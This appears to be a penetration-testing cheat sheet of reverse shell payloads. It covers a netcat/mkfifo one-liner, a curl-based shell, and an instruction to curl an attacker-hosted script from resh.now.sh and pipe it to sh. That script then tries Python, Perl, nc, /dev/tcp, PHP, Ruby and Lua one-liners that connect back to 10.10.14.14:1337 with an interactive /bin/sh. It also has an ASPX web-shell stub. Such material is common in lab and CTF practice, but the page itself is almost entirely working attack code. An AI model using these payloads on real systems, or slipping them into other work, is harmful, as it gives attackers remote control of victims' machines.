Shells
Linux Default
touch /tmp/x; rm /tmp/x; mkfifo /tmp/x; cat /tmp/x | /bin/sh -i 2>&1 | nc <ip> <port> > /tmp/x
Curl Shell
{ curl -sNkT . http://$LHOST:$LPORT </dev/fd/3| sh 3>&-;} 3>&1|:
Shell.now.sh / Resh.now.sh
Replace IP & Port, then curl this attacker hosted script on the victim and pipe it to bash.
# Reverse Shell as a Service
# https://github.com/virink/reverse-shell
#
# 1. On your machine:
# nc -l 1337
#
# 2. On the target machine:
# curl https://resh.now.sh/yourip:1337 | sh
#
# 3. Don't be a dick
#
# Payload:
# curl https://resh.now.sh/10.10.14.14:1337 | sh
#
if command -v python > /dev/null 2>&1; then
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.14.14",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
exit;
fi
if command -v perl > /dev/null 2>&1; then
perl -e 'use Socket;$i="10.10.14.14";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
exit;
fi
if command -v nc > /dev/null 2>&1; then
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 1337 >/tmp/f
exit;
fi
if command -v sh > /dev/null 2>&1; then
/bin/sh -i >& /dev/tcp/10.10.14.14/1337 0>&1
exit;
fi
if command -v php > /dev/null 2>&1; then
php -r '$sock=fsockopen("10.10.14.14",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
exit;
fi
if command -v ruby > /dev/null 2>&1; then
ruby -rsocket -e'f=TCPSocket.open("10.10.14.14",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
exit;
fi
if command -v lua > /dev/null 2>&1; then
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.10.14.14','1337');os.execute('/bin/sh -i <&3 >&3 2>&3');"
exit;
fi
ASPX
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
... ( C# Code, Shellcode Runner or similar ) ...
</script>
Last updated